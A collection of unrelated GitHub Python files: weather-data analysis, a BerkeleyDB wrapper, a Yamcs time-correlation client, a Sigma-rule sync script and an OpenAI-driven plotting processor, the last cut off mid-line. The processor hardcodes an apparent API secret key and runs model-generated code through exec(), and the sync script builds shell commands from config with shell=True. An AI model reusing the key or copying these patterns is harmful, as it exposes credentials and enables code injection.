+{"seq_id":"31462640590","text":"from operator import ge\nfrom functions.dataset import get_cleaned_data\nfrom functions.input import input_capitalization\n\ndef get_column_names ():\n '''Returns the column names of the dataset.'''\n\n cleaned_data = get_cleaned_data()\n\n return cleaned_data[0]\n\n\ndef get_data_by_header_list(headers: 'list', start: int = 1, end: int = 0):\n '''Retrieves all data within the columns listed inside the input list,\n \n arg: list of column names (ex. ['Year', 'Day']),\n \n returns a list of data based on the inputed headers.'''\n\n header_indexes = header_title_to_header_index(headers)\n\n data_based_on_headers = []\n\n for header_index in header_indexes:\n data_by_index = get_data_by_column_index(header_index, start, end)\n\n data_based_on_headers.append(data_by_index)\n \n merged_data = merge_list_data(data_based_on_headers)\n\n return merged_data\n\n\ndef merge_list_data(data: list[list]):\n '''Merges the contents of a list of lists by index,\n \n ex. [['YEAR', '2018'], ['DAY', '23']] => [['YEAR', 'DAY'], ['2018', '23']],\n \n arg: a list of column data as individual lists,\n\n returns a list of lists based on the format of the dataset.'''\n merged_list = []\n index_counter = 0\n \n while index_counter < len(data[0]):\n comb_row = []\n\n for element in data:\n comb_row.append(element[index_counter])\n\n merged_list.append(comb_row)\n index_counter += 1\n\n return merged_list\n\n\ndef header_title_to_header_index(headers: list):\n '''Matches the header title (of type string within a list) \n to the appropriate header index of the dataset,\n \n ex. ['Year', 'Day'] => [3, 5],\n\n arg: a list containing header titles of type string,\n \n returns a list of the header indexes as integers.'''\n header_indexes = []\n\n column_names = get_column_names()\n\n for element in headers:\n header = input_capitalization(element)\n\n for index, element in enumerate(column_names):\n if header == element:\n header_indexes.append(index)\n \n return header_indexes\n\n\ndef get_data_by_column_index(index: int, start: int = 1, end: int = 0):\n '''Extracts all data of the indexed column and returns them as a list,\n \n ex. index = 3 => returning all data of column 'YEAR' as a list,\n\n args: column index as integer, \n starting row as integer (default: first row, starting index: 1),\n final row as integer (default: last row)\n \n returns the data inside the indexed column as a list.'''\n \n cleaned_data = get_cleaned_data()\n\n column_data = []\n\n if end == 0:\n # deliberately exclude last row from looping since it is empty\n end = len(cleaned_data)\n\n for row in range(start - 1, end):\n column_data.append(cleaned_data[row][index])\n\n return column_data\n\n\n\ndef get_data_by_row(index: int):\n '''Extracts all data of the indexed row and returns them as a list,\n \n ex. index = 3 => returning all data of row 3 as a list,\n\n arg: row index as an integer, \n \n returns the data inside the indexed row as a list.'''\n\n cleaned_data = get_cleaned_data()\n\n row_data = cleaned_data[index]\n\n return row_data\n\n\ndef find_in_row_by_header(row: int, column_header: list):\n '''Retrieves the value which corresponds to the indexed row and column header,\n \n ex. row = 3,\n column_header = 'YEAR' => returns the value of column 'YEAR' in row 3,\n\n arg: row index as an integer, \n column_header as a list\n\n returns the value corresponding to the indexed row and column header as a string.'''\n\n row_data = get_data_by_row(row)\n\n column_indices = header_title_to_header_index(column_header)\n\n for index in column_indices:\n row_header_value = row_data[index]\n return row_header_value\n\ndef get_highest_lowest_year(year_boundary: str = 'MAX'):\n '''Finds the maximum or the minimum available year in the dataset and returns that year,\n \n arg: string of value either 'MAX' or 'MIN',\n \n returns either the minimum or the maximum year.'''\n\n header_list = ['YEAR']\n data = get_data_by_header_list(header_list)\n\n data.sort()\n\n if year_boundary == 'MIN':\n return data[0]\n else:\n return data[-2]\n\n\n# Task5 solution ~ @konspapp\ndef get_highest_temperature_by_year(year_min: int = 2006, year_max: int = 2018):\n '''Calculates and prints the highest temperature of every year,\n \n no-arg (default): Calculates between the lowest and the highest available year,\n arg1 (optional): lower boundary year as integer,\n arg2 (optional): upper boundary year as integer,\n \n prints the highest recorded temperature for each year.'''\n\n header_list = ['YEAR', 'HIGH_TEMP']\n data = get_data_by_header_list(header_list)\n\n highest_temp = 0\n\n for year in range(year_min, year_max + 1):\n for row in range(1, len(data)):\n temperature = data[row][1]\n\n try:\n temperature = float(temperature)\n except:\n continue\n\n if data[row][0] == str(year):\n if temperature > highest_temp:\n highest_temp = temperature\n\n highest_temp_of_year = highest_temp\n\n highest_temp = 0\n print('The highest temperature recorded in ' + str(year) + ' had a value of ' + str(highest_temp_of_year))\n\n\n# Task6 solution ~ @konspapp\ndef get_highest_amount_of_rain():\n '''Calculates and displays the region with the highest amount of rain.'''\n\n header_list = ['STATION_REGION', 'STATION_NAME', 'YEAR', 'MONTH', 'DAY', 'RAIN']\n data = get_data_by_header_list(header_list)\n\n max_rain = 0\n\n for row in range(1, len(data)):\n rain = data[row][5]\n\n try:\n rain = float(rain)\n\n except:\n continue\n\n if rain > max_rain:\n max_rain = rain\n result = [data[row][0], data[row][1], data[row][2], data[row][3], data[row][4], data[row][5], ]\n\n print(f'{result[1]} station in {result[0]} had the highest amount of rain ({result[5]}) on {result[4]}/{result[3]}/{result[2]}')\n\n\n# -------------vandl's work-----------------------------------------------------------------------------#\n\n\n# creating a middle term function for later use.\ndef middleterm(arg):\n num_arg = []\n for i in arg:\n try:\n num_arg.append(float(i))\n except:\n continue\n return (sum(num_arg) / len(num_arg))\n\n\ndef five_highestorlowest_temperature_cities_in2018(arguement=\"none\"):\n\n # Takes High, low , or none as argument and returns the 5 cities with lowest/highest temperature average in 2018\n\n cleaned_data = get_cleaned_data()\n\n arguement = arguement.lower() # making argument case-insensitive\n\n # filtering data\n\n data_in2018 = []\n # year_index = getindex(\"STATION NAME\")\n\n for i in cleaned_data:\n #\n if i[3] == \"2018\":\n data_in2018.append(i)\n else:\n continue\n\n # data_in2018 now has CSV rows only from year 2018\n # headers NOT included in data_in2018!\n # creating a list with all cities once\n\n cities = []\n for i in data_in2018:\n if i[2] not in cities:\n cities.append(i[2])\n\n high_temp_dictionary = {}\n low_temp_dictionary = {}\n\n for i in cities:\n low_temp_dictionary[i] = []\n\n for i in cities:\n high_temp_dictionary[i] = []\n # {'Αγία Κυριακή Ιωαννίνων': [], 'Άρτα': []...\n\n for key in low_temp_dictionary:\n # creating variable as already existing key's value, appending in var the items we need and then putting var\n # back in key as value\n for row in data_in2018:\n if row[2] == key:\n var = low_temp_dictionary[key] # this is the keys value!\n var.append(row[9])\n low_temp_dictionary[key] = var\n\n # lowmiddleterm dictionary now has all low temperetures in a list as value for every key (city).\n\n # finding middle term of each value and putting it as the new value in dictionary, using same logic as above.\n\n for key in low_temp_dictionary:\n var = low_temp_dictionary[key]\n low_temp_dictionary[key] = middleterm(var)\n\n # same for highest temps. 110- 133 are the only lines i could find a way not to duplicate...\n\n for key in high_temp_dictionary:\n # creating variable as already existing key's value, appending in var the items we need and then putting var\n # back in key as value\n for row in data_in2018:\n if row[2] == key:\n var = high_temp_dictionary[key] # this is the keys value!\n var.append(row[7])\n high_temp_dictionary[key] = var\n\n # lowmiddleterm and highermiddleterm dictionaries now have all low temperetures in a list as value for every key (\n # city).\n\n # finding middle term of each value and putting it as the new value in dictionary, using same logic as above.\n\n for key in high_temp_dictionary:\n var = high_temp_dictionary[key]\n high_temp_dictionary[key] = middleterm(var)\n\n lowest_temperature_cities2018 = []\n highest_temperature_cities2018 = []\n\n # appending lowest and highest 5 temperature cities in list.\n for i in range(5):\n lowest_temperature_cities2018.append(min(low_temp_dictionary))\n low_temp_dictionary.pop(min(low_temp_dictionary))\n highest_temperature_cities2018.append(max(high_temp_dictionary))\n high_temp_dictionary.pop(max(high_temp_dictionary))\n\n # returning data according to users arguement\n if arguement == \"none\":\n return \"The cities with lowest temperatures in 2018 are: \" + \", \".join(\n lowest_temperature_cities2018) + \".\" + \"\\n\" + \"The cities with highest temperatures in 2018 are: \" + \", \".join(\n highest_temperature_cities2018) + \".\"\n elif arguement == \"low\":\n return \"The cities with lowest temperatures in 2018 are: \" + \", \".join(lowest_temperature_cities2018) + \".\"\n elif arguement == \"high\":\n return \"The cities with highest temperatures in 2018 are: \" + \", \".join(highest_temperature_cities2018) + \".\"\n else:\n return \"Invalid arguement. Valid arguements are High, Low or no arguement.\"\n\n\n# ----------------------------- task 4 ---------------------------------------\n\ndef middleterm_of_place_in_2006_and_2018(region):\n\n # Takes a greek region as arguement and compares the average temperature in 2018 with average temperature in\n # N-year, N based on which year has most data to compare.\n # e.g. middleterm_of_place_in_2006_and_2018('Θράκη)\n # returns In Θράκη , 2018 had excactly the same temperature as 2017\n\n cleaned_data = get_cleaned_data()\n regions = ['Ήπειρος', 'Θεσσαλία', 'Θράκη', 'Κρήτη', 'Μακεδονία', 'Ν. Αιγαίου', 'Ν. Ιονίου', 'Πελοπόννησος',\n 'Στερεά Ελλάδα']\n\n n = 2006 # default n year\n\n if region not in regions: # validation\n return \"Arguement must be a greek region, case sensitive!\"\n\n region_data_2018 = {}\n region_data_nyear = {}\n\n for i in cleaned_data: # creating a dictionary with each regions city as key and empty list as value\n if i[1] == region and i[3] == '2018':\n region_data_2018[i[2]] = []\n\n year_and_data_lengths = {} # finding what year has most data\n for i in range(2006, 2018):\n year_and_data_lengths[i] = []\n\n for year in range(2006, 2018):\n for row in cleaned_data:\n if row[1] == region and row[3] == str(year):\n var = year_and_data_lengths[year]\n if row[2] not in year_and_data_lengths[year]: # in each year/key, each city must be only once\n var.append(row[2])\n year_and_data_lengths[year] = var\n\n for key in year_and_data_lengths: # finding which year has most cities as value / most data\n year_and_data_lengths[key] = len(year_and_data_lengths[key])\n\n n = max(year_and_data_lengths) # according to task, we compare 2018 to year with most data / with max\n # year_and_data_lengths\n\n for i in cleaned_data:\n if i[1] == region and i[3] == str(n):\n region_data_nyear[i[2]] = []\n\n # data in 2018\n data_in_2018 = []\n for i in cleaned_data:\n if i[3] == '2018':\n data_in_2018.append(i)\n\n data_in_nyear = []\n for i in cleaned_data:\n if i[3] == '2018':\n data_in_nyear.append(i)\n\n for key in region_data_2018: # in region_data_2018 appending each MEAN_TEMP as value in list for each city in\n # region.\n for row in data_in_2018:\n if row[2] == key:\n var = region_data_2018[key]\n var.append(row[6]) # appending in value the mean temp\n region_data_2018[key] = var\n\n # for nyear\n for key in region_data_nyear: # in region_data_2018 appending each MEAN_TEMP as value in list for each city\n # in region.\n for row in data_in_nyear:\n if row[2] == key:\n var = region_data_nyear[key]\n var.append(row[6]) # appending in value the mean temp\n region_data_nyear[key] = var\n\n for key in region_data_2018: # value = middle term([MEANS_TEMPS])\n var = region_data_2018[key]\n region_data_2018[key] = middleterm(var)\n for key in region_data_nyear:\n var = region_data_nyear[key]\n try: # there are some empty lists, try except because we will get zero division error in middle term function\n region_data_nyear[key] = middleterm(var)\n except:\n continue\n\n region_2018_tempslist = []\n region_nyear_tempslist = []\n\n for i in region_data_2018:\n region_2018_tempslist.append(region_data_2018[i])\n for i in region_data_nyear:\n region_nyear_tempslist.append(region_data_nyear[i])\n\n final_temperature_middle_term_2018 = round(middleterm(region_2018_tempslist), 2) # middle term of temperatures\n # list, rounding to 2 decimals\n final_temperature_middle_term_nyear = round(middleterm(region_nyear_tempslist), 2)\n\n if final_temperature_middle_term_2018 > final_temperature_middle_term_nyear:\n return \"In \" + str(region) + \", 2018 was hotter than \" + str(n) + \" by \" + str(\n round((final_temperature_middle_term_2018 - final_temperature_middle_term_nyear), 2)) + \" degrees celcius.\"\n elif final_temperature_middle_term_2018 < final_temperature_middle_term_nyear:\n return \"In \" + str(region) + \" , \" + str(n) + \" was hotter than 2018\" + \" by \" + str(\n round((final_temperature_middle_term_nyear - final_temperature_middle_term_2018), 2)) + \" degrees celcius.\"\n elif final_temperature_middle_term_2018 == final_temperature_middle_term_nyear:\n return \"In \" + str(region) + \" , \" + \"2018 had excactly the same temperature as \" + str(n)","repo_name":"ElSarik/GreekWeatherDataAnalysis","sub_path":"functions/dataset_api.py","file_name":"dataset_api.py","file_ext":"py","file_size_in_byte":15131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17567173816","text":"# buy low sell high \n# gadrion - 03/04/2022\n\ndef maxProfit(prices):\n l, r = 0, 1 # left=buy, right=sell\n maxP = 0\n\n while r < len(prices):\n # profitable ?\n if prices[l] < prices[r]:\n profit = prices[r] - prices[l]\n if profit > maxP:\n maxP = profit\n else:\n l = r\n r += 1\n return maxP\n\n\nif __name__ == \"__main__\":\n prices = [7,1,5,3,6,4]\n print(maxProfit(prices))\n","repo_name":"gadr1on/PMP","sub_path":"python/concepts/leetcode_75_questions/02_sell_buy_stock.py","file_name":"02_sell_buy_stock.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38943646264","text":"\"\"\"Get Sigma rules from various git repositories\"\"\"\n\nimport json\nimport logging\nimport sys\nfrom subprocess import check_output, call\n\nlogging.basicConfig(format=r\"%(asctime)s %(message)s\", level=logging.INFO)\n\n\ndef check(command):\n \"\"\"Wrapper around subprocess.check_ouptut\"\"\"\n return check_output(command, shell=True)\n\n\ndef get_rules():\n \"\"\"Load in rule sources config file\"\"\"\n\n try:\n rule_sources = json.loads(sys.argv[1])\n except IndexError:\n with open(\"rule_sources.json\") as rule_sources:\n rule_sources = json.load(rule_sources)\n return rule_sources\n\n\ndef main():\n \"\"\"Main\"\"\"\n sync_dirs = []\n cleanup_dirs = []\n for source in get_rules():\n try:\n repo = source[\"repo\"]\n except IndexError:\n logging.error(\"Missing field 'repo'\")\n continue\n\n branch = source.get(\"branch\", \"master\")\n path = source.get(\"path\", \"\")\n\n # Clone\n call(f\"git clone {repo} > /dev/null 2>&1\", shell=True)\n repo_dir = repo.split(\"/\")[-1].split(\".\")[0]\n check(\n f\"cd {repo_dir} && git checkout {branch} > /dev/null 2>&1 && cd {'../'*len(repo_dir.split('/'))}\")\n\n # Save for sync and cleanup outside of for loop\n cleanup_dirs.append(repo_dir)\n sync_dirs.append(f\"{repo_dir}/{path}\")\n\n # Sync all sync_dirs together into ./rules\n check(\"rm -rf rules && mkdir rules\")\n check(f\"rsync -rtvu {' '.join(sync_dirs)} rules\")\n\n # Move rules into build dir\n logging.info(\"Moving rules to engine build directory\")\n build_dir = \"../images/rules/\"\n check(f\"rm -rf {build_dir}\")\n check(f\"mv rules {build_dir}\")\n\n # Remove directories\n logging.info(\"Cleaning up\")\n cleanup_dirs.append(\"rules\")\n for directory in cleanup_dirs:\n logging.info(f\"Removing {directory}\")\n check(f\"rm -rf {directory}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"boozallen-darklabs/k8s-go-sigma-streamer","sub_path":"helpers/update_rules.py","file_name":"update_rules.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"73929669099","text":"import sys\nfrom module.description import Description\n\nif __name__ == \"__main__\":\n desc = Description()\n state, description = desc.init()\n print(state, description)\n if state < 0:\n sys.exit(0)\n\n sentence_list = [\n \n '她闭着眼睛,绝美的脸庞显露出痛苦的神情', # 神态\n ]\n state, desc_info = desc.get_all_descriptions(sentence_list)\n if desc_info['num'] == 1:\n print(\"是环境描写\")\n else:\n print(\"不是环境描写\")\n \n # print(desc_info)\n","repo_name":"tal-tech/environment_depiction_sentence_detection","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"9710751833","text":"# Requires bsddb3 package.\nimport bsddb3\nfrom bsddb3.db import DBNotFoundError\n\nfrom kvkit.backends.helpers import KVHelper\n\n\nclass BerkeleyDB(KVHelper, bsddb3._DBWithCursor):\n def __init__(self, filename, flag='c', mode=0o666, btflags=0,\n cache_size=None, maxkeypage=None, minkeypage=None,\n page_size=None, lorder=None):\n\n self.filename = filename\n flags = bsddb3._checkflag(flag, filename)\n env = bsddb3._openDBEnv(cache_size)\n db = bsddb3.db.DB(env)\n if page_size is not None:\n db.set_pagesize(page_size)\n if lorder is not None:\n db.set_lorder(lorder)\n db.set_flags(btflags)\n if minkeypage is not None:\n db.set_bt_minkey(minkeypage)\n if maxkeypage is not None:\n db.set_bt_maxkey(maxkeypage)\n db.open(self.filename, bsddb3.db.DB_BTREE, flags, mode)\n super(BerkeleyDB, self).__init__(db)\n\n def __getitem__(self, key):\n if isinstance(key, slice):\n if key.start > key.stop or key.step:\n return self.get_slice_rev(key.start, key.stop)\n else:\n return self.get_slice(key.start, key.stop)\n else:\n return super(BerkeleyDB, self).__getitem__(key)\n\n def get_slice(self, start, end):\n try:\n key, value = self.set_location(start)\n except DBNotFoundError:\n raise StopIteration\n else:\n if key > end:\n raise StopIteration\n yield key, value\n\n while True:\n try:\n key, value = self.next()\n except DBNotFoundError:\n raise StopIteration\n else:\n if key > end:\n raise StopIteration\n yield key, value\n\n def get_slice_rev(self, start, end):\n if start is None or end is None:\n start, end = end, start\n\n if start is None:\n key, value = self.last()\n else:\n try:\n key, value = self.set_location(start)\n except DBNotFoundError:\n key, value = self.last()\n\n if start is None or key <= start:\n yield key, value\n\n while True:\n try:\n key, value = self.previous()\n except DBNotFoundError:\n raise StopIteration\n else:\n if key < end:\n raise StopIteration\n yield key, value\n","repo_name":"coleifer/kvkit","sub_path":"kvkit/backends/berkeleydb.py","file_name":"berkeleydb.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"92"} +{"seq_id":"20307229426","text":"import datetime\nfrom typing import List, Optional\n\nfrom yamcs.core.context import Context\nfrom yamcs.core.helpers import to_server_time\nfrom yamcs.protobuf.tco import tco_pb2\nfrom yamcs.tco.model import TCOStatus, TofInterval\n\n\nclass TCOClient:\n \"\"\"\n Client for interacting with a Time Correlation service managed by Yamcs.\n \"\"\"\n\n def __init__(self, ctx: Context, instance: str, service: str):\n super(TCOClient, self).__init__()\n self.ctx = ctx\n self._instance = instance\n self._service = service\n\n def get_status(self) -> TCOStatus:\n \"\"\"\n Retrieve the TCO status.\n \"\"\"\n response = self.ctx.get_proto(f\"/tco/{self._instance}/{self._service}/status\")\n message = tco_pb2.TcoStatus()\n message.ParseFromString(response.content)\n return TCOStatus(message)\n\n def reconfigure(\n self,\n accuracy: Optional[float] = None,\n validity: Optional[float] = None,\n ob_delay: Optional[float] = None,\n default_tof: Optional[float] = None,\n ):\n \"\"\"\n Updates one or more TCO options\n\n :param accuracy:\n Accuracy in seconds.\n :param validity:\n Validity in seconds.\n :param ob_delay:\n Onboard delay in seconds.\n :param default_tof:\n Default ToF in seconds. This value is used if the ToF estimator\n does not find a matching interval.\n \"\"\"\n req = tco_pb2.TcoConfig()\n if accuracy is not None:\n req.accuracy = accuracy\n if validity is not None:\n req.validity = validity\n if ob_delay is not None:\n req.onboardDelay = ob_delay\n if default_tof is not None:\n req.defaultTof = default_tof\n\n url = f\"/tco/{self._instance}/{self._service}/config\"\n self.ctx.post_proto(url, data=req.SerializeToString()) # TODO should be patch\n\n def add_tof_interval(\n self, start: datetime.datetime, stop: datetime.datetime, polynomial: List[float]\n ):\n \"\"\"\n Defines a ToF interval for the ERT range ``[start, stop]``, specifying\n a polynomial function of the form: `tof = a + bx + cx^2 + ...` where `x`\n is ERT minus the provided start date.\n\n :param start:\n ERT start\n :param stop:\n ERT stop\n :param polynomial:\n Coefficients in the order ``[a, b, c, ...]``\n \"\"\"\n self.add_tof_interval([TofInterval(start, stop, polynomial)])\n\n def add_tof_intervals(self, intervals: List[TofInterval]):\n \"\"\"\n Adds multiple ToF intervals at once.\n\n :param intervals:\n List of ToF intervals.\n \"\"\"\n req = tco_pb2.AddTimeOfFlightIntervalsRequest()\n for interval in intervals:\n tof = req.intervals.add()\n tof.ertStart.MergeFrom(to_server_time(interval.start))\n tof.ertStop.MergeFrom(to_server_time(interval.stop))\n tof.polCoef.extend(interval.polynomial)\n\n url = f\"/tco/{self._instance}/{self._service}/tof:addIntervals\"\n self.ctx.post_proto(url, data=req.SerializeToString())\n\n def remove_tof_intervals(self, start: datetime.datetime, stop: datetime.datetime):\n \"\"\"\n Removes previously registered ToF intervals whose start date\n falls in the specified range ``[start, stop]``.\n\n :param start:\n ERT start\n :param stop:\n ERT stop\n \"\"\"\n req = tco_pb2.DeleteTimeOfFlightIntervalsRequest()\n req.start.MergeFrom(to_server_time(start))\n req.stop.MergeFrom(to_server_time(stop))\n\n url = f\"/tco/{self._instance}/{self._service}/tof:deleteIntervals\"\n self.ctx.post_proto(url, data=req.SerializeToString())\n\n def reset_coefficients(self):\n \"\"\"\n Resets current TCO coefficients, as well as any\n collected samples.\n \"\"\"\n url = f\"/tco/{self._instance}/{self._service}:reset\"\n self.ctx.post_proto(url)\n\n def override_coefficients(\n self, utc: datetime.datetime, obt: int, gradient: float = 0, offset: float = 0\n ):\n \"\"\"\n Manually override the assocation between UTC and\n onboard time.\n\n .. note::\n If later on you want to revert to automatically computed\n coefficients, use :meth:`reset_coefficients`.\n\n :param utc:\n UTC\n :param obt:\n Onboard time\n :param gradient:\n Gradient\n :param offset:\n Offset\n \"\"\"\n req = tco_pb2.TcoCoefficients()\n req.utc.MergeFrom(to_server_time(utc))\n req.obt = obt\n req.gradient = gradient\n req.offset = offset\n\n url = f\"/tco/{self._instance}/{self._service}/coefficients\"\n self.ctx.post_proto(url, data=req.SerializeToString())\n","repo_name":"yamcs/python-yamcs-client","sub_path":"yamcs-client/src/yamcs/tco/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"92"} +{"seq_id":"19489073996","text":"from qgis.PyQt.QtCore import QSettings\nfrom qgis.PyQt.QtGui import QColor\nfrom qgis.PyQt.QtWidgets import QWidget, QGridLayout\nfrom qgis.core import QgsCoordinateTransform, QgsProject\nfrom qgis.gui import QgsMapToolPan, QgsMapCanvas\nfrom qgis.utils import iface\n\nfrom ThRasE.utils.system_utils import block_signals_to\n\n\nclass RenderWidget(QWidget):\n def __init__(self, parent=None):\n QWidget.__init__(self, parent)\n self.setupUi()\n self.active_layers = None # instances of active layers\n self.crs = None\n\n def setupUi(self):\n gridLayout = QGridLayout(self)\n gridLayout.setContentsMargins(0, 0, 0, 0)\n self.canvas = QgsMapCanvas()\n self.canvas.setCanvasColor(QColor(255, 255, 255))\n self.canvas.setStyleSheet(\"border: 0px;\")\n settings = QSettings()\n self.canvas.enableAntiAliasing(settings.value(\"/qgis/enable_anti_aliasing\", False, type=bool))\n self.setMinimumSize(15, 15)\n # action pan and zoom\n self.default_point_tool = QgsMapToolPan(self.canvas)\n self.canvas.setMapTool(self.default_point_tool, clean=True)\n\n gridLayout.addWidget(self.canvas)\n\n def refresh(self):\n if self.active_layers is not None:\n [active_layer.layer.reload() for active_layer in self.active_layers if active_layer.is_active]\n [active_layer.layer.triggerRepaint() for active_layer in self.active_layers if active_layer.is_active]\n self.canvas.refreshAllLayers()\n\n def set_crs(self, crs):\n self.crs = crs\n self.update_render_layers()\n\n def update_render_layers(self):\n with block_signals_to(self):\n # set the CRS of the canvas view\n if self.crs:\n # use the crs of thematic raster to edit\n self.canvas.setDestinationCrs(self.crs)\n else:\n # use the crs set in Qgis\n self.canvas.setDestinationCrs(iface.mapCanvas().mapSettings().destinationCrs())\n # get all valid activated layers\n valid_layers = [active_layer.layer for active_layer in self.active_layers if active_layer.is_active]\n if len(valid_layers) == 0:\n self.canvas.setLayers([])\n self.refresh()\n return\n # set to canvas\n self.canvas.setLayers(valid_layers)\n # set init extent from other view if any is activated else set layer extent\n from ThRasE.gui.main_dialog import ThRasEDialog\n others_extents = [view_widget.render_widget.canvas.extent() for view_widget in ThRasEDialog.view_widgets\n if view_widget.is_active and view_widget.render_widget != self\n and not view_widget.render_widget.canvas.extent().isEmpty()]\n if others_extents:\n # set extent using the extent of the other valid view (or self) with at least one layer\n extent = others_extents[0]\n self.update_canvas_to(extent)\n elif self.canvas.extent().isEmpty():\n # first layer to render\n # set the extent using the extent of the Qgis project but first transform the crs if it is different\n new_layer = valid_layers[0]\n transform = QgsCoordinateTransform(new_layer.crs(), self.canvas.mapSettings().destinationCrs(), QgsProject.instance())\n new_extent = transform.transformBoundingBox(new_layer.extent())\n self.canvas.setExtent(new_extent)\n\n self.refresh()\n\n def update_canvas_to(self, new_extent):\n with block_signals_to(self.canvas):\n self.canvas.setExtent(new_extent)\n self.refresh()\n","repo_name":"SMByC/ThRasE","sub_path":"gui/render_widget.py","file_name":"render_widget.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"92"} +{"seq_id":"20652157363","text":"# work_with_db.py\nfrom sqlalchemy import create_engine, Column, Integer, String\nfrom sqlalchemy.orm import Session, declared_attr, declarative_base\n\n\n# Обычно класс, на основе которого создаётся декларативная база,\n# называют так же, как и сам класс декларативной базы.\nclass Base:\n\n @declared_attr\n def __tablename__(cls):\n return cls.__name__.lower()\n\n id = Column(Integer, primary_key=True)\n\n\nBase = declarative_base(cls=Base)\n\n\nclass Pep(Base):\n pep_number = Column(Integer, unique=True)\n name = Column(String(200))\n status = Column(String(20))\n\n def __repr__(self):\n # При вызове функции print()\n # будут выводиться значения полей pep_number и name.\n return f'PEP {self.pep_number} {self.name}' \n\n\n\nfrom sqlalchemy import insert, select, update, delete\n# work_with_db.py\nif __name__ == '__main__':\n engine = create_engine('sqlite:///sqlite.db', echo=False)\n session = Session(engine)\n\n result = session.execute(\n select(Pep).where(Pep.status == 'Active')\n )\n print(result.all()) \n \n session.execute(\n update(Pep).where(Pep.pep_number == 8).values(status='Active')\n)\n session.commit() ","repo_name":"authorIsRight/training_parsing_yap","sub_path":"work_with_db.py","file_name":"work_with_db.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"2824276512","text":"from .elevation import clear_cache, get_elevation\n\nfrom argparse import ArgumentParser\n\ndef main():\n # set up command line arguments\n parser = ArgumentParser()\n parser.add_argument('--lat', type=float, default=None)\n parser.add_argument('--lon', type=float, default=None)\n parser.add_argument('--clean', action='store_true')\n\n # parse command line input\n args = parser.parse_args()\n\n # clear the cache if desired\n if args.clean:\n clear_cache()\n\n # get the elevation\n lat, lon = args.lat, args.lon\n if lat is not None:\n if lon is not None:\n print(get_elevation(lat=lat, lon=lon))\n else:\n raise Exception('Must specify longitude with --lon')\n else:\n if lon is not None:\n raise Exception('Must specify latitude with --lat')\n else:\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"sgherbst/pyhigh","sub_path":"pyhigh/pyhigh.py","file_name":"pyhigh.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"70714367661","text":"import json\nimport os\nimport sys\n\nimport openai\nimport pandas as pd\nimport sqlfluff\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\nimport numpy as np\nimport plotly.express as px\n\nROOT_PATH = os.path.join(os.path.dirname(__file__), \"../../\")\nsys.path.insert(0, ROOT_PATH)\n\nfrom binder.binder_params import DEFAULT_BINDER_PARAMS\nfrom binder.generation.generator import Generator\nfrom binder.nsql.database import NeuralDB\nfrom binder.nsql.nsql_exec import Executor\n\n\nclass Processor:\n def __init__(self, dataset, query, key = \"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\"):\n self.dataset = dataset\n self.query = query\n # Set the API key for the OpenAI account\n self.key = key\n openai.api_key = key\n\nclass PlotterProcessor(Processor):\n mode = 'plotter'\n\n def load_template_prompt(self):\n # Load the template prompt\n with open(\"templates/%s_template_prompt.txt\" % (self.mode), \"r\") as f:\n plotter_template = f.read()\n return plotter_template\n\n def load_client_prompt_prefix(self):\n # Load the template prompt\n with open(\"templates/%s_client_prompt_prefix.txt\" % (self.mode), \"r\") as f:\n plotter_template = f.read()\n return plotter_template\n\n def load_client_prompt_suffix(self, query):\n return \"Q: %s\\nNeuralPlot:\" % (query) \n\n def construct_data_header(self, tail_size = 3):\n prompt_prefix = self.load_client_prompt_prefix()\n tail_size = int(prompt_prefix.split('tail(')[1][:1])\n data_header = self.dataset.tail(tail_size).to_string() + \"\\n\"\n prompt_suffix = self.load_client_prompt_suffix(self.query)\n\n return prompt_prefix + data_header + prompt_suffix\n\n def construct_prompt(self):\n prompt = self.load_template_prompt() + self.construct_data_header(self.dataset)\n print(\n \"Prompt:\\n%s\" % (prompt)\n )\n return prompt\n\n def generate_response(self):\n # Use the GPT-3 model to generate text\n response = openai.Completion.create(\n engine=\"code-davinci-002\",\n prompt=self.construct_prompt(),\n max_tokens=128,\n temperature=0.5,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n response_text = response[\"choices\"][0][\"text\"]\n print(\n \"response_text:\\n%s\" % (response_text)\n )\n return ';'.join(response_text.strip(' ').split(';')[:-1])\n\n def produce_payload(self, temp_file = \"temp.json\"):\n raw_response = None\n try:\n response = self.generate_response()\n raw_response = response\n response += \"\"\"; f = open(temp_file, \"w\"); f.write(fig.to_json()); f.close();\"\"\"\n\n # execute the response, which should result in a json file being written\n dataset = self.dataset # need this for successful exec\n exec(response)\n with open(temp_file, \"r\") as f:\n payload = json.load(f)\n \n payload['response_code'] = raw_response\n return payload\n except Exception as e:\n print('an exception e happened =', e)\n return {'error': str(e), 'query': raw_response}\n\nclass TableProcessor(Processor):\n mode = 'table'\n params = DEFAULT_BINDER_PARAMS\n\n def produce_payload(self):\n nsql = None \n try:\n generator = Generator(self.params, keys=[self.key])\n\n title = \"\" # TODO\n prompt_args = {\n 'table': self.dataset.head(),\n 'title': title,\n 'question': self.query\n }\n\n few_shot_prompt = generator.build_few_shot_prompt_from_file(\n file_path=self.params.prompt_file,\n n_shots=self.params.n_shots,\n )\n generate_prompt = generator.build_generate_prompt(\n data_item=prompt_args,\n generate_type=(self.params.generate_type,)\n )\n prompt = few_shot_prompt + 